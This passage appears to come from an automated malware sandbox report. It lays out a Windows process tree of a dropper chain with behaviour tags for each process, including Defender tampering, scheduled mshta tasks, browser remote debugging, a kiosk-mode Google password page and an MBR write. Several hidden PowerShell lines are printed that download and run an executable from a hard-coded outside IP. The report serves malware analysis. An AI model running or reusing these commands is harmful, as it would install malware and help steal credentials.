        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5028
        
        C:\Users\Admin\AppData\Local\TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE
        
        "C:\Users\Admin\AppData\Local\TempIEGKEXBU6CBIIWDYOVL2HTXRCHILTJJL.EXE"
        8⤵
        Modifies Windows Defender DisableAntiSpyware settings
        Modifies Windows Defender Real-time Protection settings
        Modifies Windows Defender TamperProtection settings
        Modifies Windows Defender notification settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1340
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1087772021\am_no.cmd" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4160
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1087772021\am_no.cmd" any_word
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2776
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        7⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:3236
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4368
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1676
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5076
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2292
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2724
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1564
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "gsfI8madSfu" /tr "mshta \"C:\Temp\YgZJfCWtD.hta\"" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3268
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\YgZJfCWtD.hta"
        7⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:3236
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:1260
    - - C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:4892
      - C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"
        6⤵
        Executes dropped EXE
        
        PID:5076
      - C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1512
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 972
        6⤵
        Program crash
        
        PID:2360
    - - C:\Users\Admin\AppData\Local\Temp\1087989001\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1087989001\amnew.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:1908
      - C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        6⤵
        Downloads MZ/PE file
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2936
        
        C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
        7⤵
        Executes dropped EXE
        
        PID:1804
        
        C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2316
        
        C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:7272
        
        C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:7620
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7272 -s 964
        8⤵
        Program crash
        
        PID:5284
        
        C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:6464
        
        C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
        8⤵
        Executes dropped EXE
        
        PID:6508
        
        C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6512
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 1052
        8⤵
        Program crash
        
        PID:6520
        
        C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"
        7⤵
        Executes dropped EXE
        
        PID:8040
    - - C:\Users\Admin\AppData\Local\Temp\1088046001\588e9c47e5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1088046001\588e9c47e5.exe"
        5⤵
        Enumerates VirtualBox registry keys
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        
        PID:4760
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        
        PID:3824
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff8cd0fcc40,0x7ff8cd0fcc4c,0x7ff8cd0fcc58
        7⤵
        
        PID:7524
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2052,i,5066641555384292077,13738854932474275885,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2040 /prefetch:2
        7⤵
        
        PID:7652
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1912,i,5066641555384292077,13738854932474275885,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2152 /prefetch:3
        7⤵
        
        PID:7644
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2308,i,5066641555384292077,13738854932474275885,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2532 /prefetch:8
        7⤵
        
        PID:7704
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,5066641555384292077,13738854932474275885,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3256 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:8160
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,5066641555384292077,13738854932474275885,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3300 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:8180
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4548,i,5066641555384292077,13738854932474275885,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4552 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:7220
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4292,i,5066641555384292077,13738854932474275885,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4300 /prefetch:8
        7⤵
        
        PID:5376
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4696,i,5066641555384292077,13738854932474275885,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4568 /prefetch:8
        7⤵
        
        PID:5056
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4800,i,5066641555384292077,13738854932474275885,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4508 /prefetch:8
        7⤵
        
        PID:5704
    - - C:\Users\Admin\AppData\Local\Temp\1088055001\63b3bc936f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1088055001\63b3bc936f.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:4736
    - - C:\Users\Admin\AppData\Local\Temp\1088056001\ff96711009.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1088056001\ff96711009.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:4256
    - - C:\Users\Admin\AppData\Local\Temp\1088057001\ac8cfb0b0f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1088057001\ac8cfb0b0f.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:4936
    - - C:\Users\Admin\AppData\Local\Temp\1088058001\90b8a075ab.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1088058001\90b8a075ab.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:2084
    - - C:\Users\Admin\AppData\Local\Temp\1088059001\fe390939a4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1088059001\fe390939a4.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5056
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2460
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4268
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2068
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1064
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4496
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        6⤵
        
        PID:3824
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        7⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3156
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2036 -parentBuildID 20240401114208 -prefsHandle 1952 -prefMapHandle 1932 -prefsLen 27446 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {96210bcc-70b1-413d-b79d-0a022e5c1825} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" gpu
        8⤵
        
        PID:1900
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2472 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 28366 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {08d94412-11cf-448a-aeba-0c00390a9d95} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" socket
        8⤵
        
        PID:4920
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3096 -childID 1 -isForBrowser -prefsHandle 1492 -prefMapHandle 2996 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1048 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d97fa026-6166-4a2f-a3c3-2624bbc99d8b} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" tab
        8⤵
        
        PID:2792
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3080 -childID 2 -isForBrowser -prefsHandle 3600 -prefMapHandle 3204 -prefsLen 32856 -prefMapSize 244658 -jsInitHandle 1048 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {92788a3e-a0f8-46a2-9850-b565493f8287} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" tab
        8⤵
        
        PID:2488
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4444 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4440 -prefMapHandle 4428 -prefsLen 32856 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f7d892fa-03f3-4ee8-80d7-1272e0dddd6b} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" utility
        8⤵
        Checks processor information in registry
        
        PID:7164
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5164 -childID 3 -isForBrowser -prefsHandle 5152 -prefMapHandle 5188 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1048 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ade8f78-bc06-4085-aa04-bc8d25769f26} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" tab
        8⤵
        
        PID:7876
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5320 -childID 4 -isForBrowser -prefsHandle 5328 -prefMapHandle 5332 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1048 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {26c4a674-fb50-476c-b6a3-5fe5e55bf3f8} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" tab
        8⤵
        
        PID:7892
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5520 -childID 5 -isForBrowser -prefsHandle 5600 -prefMapHandle 5596 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1048 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {214408c2-1011-4c0a-9d75-7404cafc4b55} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" tab
        8⤵
        
        PID:8012
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3340 -childID 6 -isForBrowser -prefsHandle 3064 -prefMapHandle 6132 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1048 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {79aa3a28-337e-4553-bcfd-babeaf37c54e} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" tab
        8⤵
        
        PID:6836
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6372 -childID 7 -isForBrowser -prefsHandle 6336 -prefMapHandle 6272 -prefsLen 27276 -prefMapSize 244658 -jsInitHandle 1048 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {988447d2-1bb6-4853-b84e-cc02045989bf} 3156 "\\.\pipe\gecko-crash-server-pipe.3156" tab
        8⤵
        
        PID:7216
    - - C:\Users\Admin\AppData\Local\Temp\1088060001\83c51029eb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1088060001\83c51029eb.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3668
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn TboKwmaZmTU /tr "mshta C:\Users\Admin\AppData\Local\Temp\OjRuY8Tvb.hta" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4256
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn TboKwmaZmTU /tr "mshta C:\Users\Admin\AppData\Local\Temp\OjRuY8Tvb.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:5452
      - C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\OjRuY8Tvb.hta
        6⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:3968
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'12V31U8EWCHA7JVIHXZU8ZGFARBUDVPT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:7356
        
        C:\Users\Admin\AppData\Local\Temp12V31U8EWCHA7JVIHXZU8ZGFARBUDVPT.EXE
        
        "C:\Users\Admin\AppData\Local\Temp12V31U8EWCHA7JVIHXZU8ZGFARBUDVPT.EXE"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:6136
    - - C:\Users\Admin\AppData\Local\Temp\1088061001\ea982cbaed.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1088061001\ea982cbaed.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:6160
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2b1895.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2b1895.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3116
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3H13t.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3H13t.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3592
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:3724
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8e99ecc40,0x7ff8e99ecc4c,0x7ff8e99ecc58
      4⤵
      PID:2836
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1848,i,7530160685075713003,13338648554720202954,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1844 /prefetch:2
      4⤵
      PID:1340
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2168,i,7530160685075713003,13338648554720202954,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2216 /prefetch:3
      4⤵
      PID:2628
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2272,i,7530160685075713003,13338648554720202954,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2472 /prefetch:8
      4⤵
      PID:2212
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3192,i,7530160685075713003,13338648554720202954,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1604
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
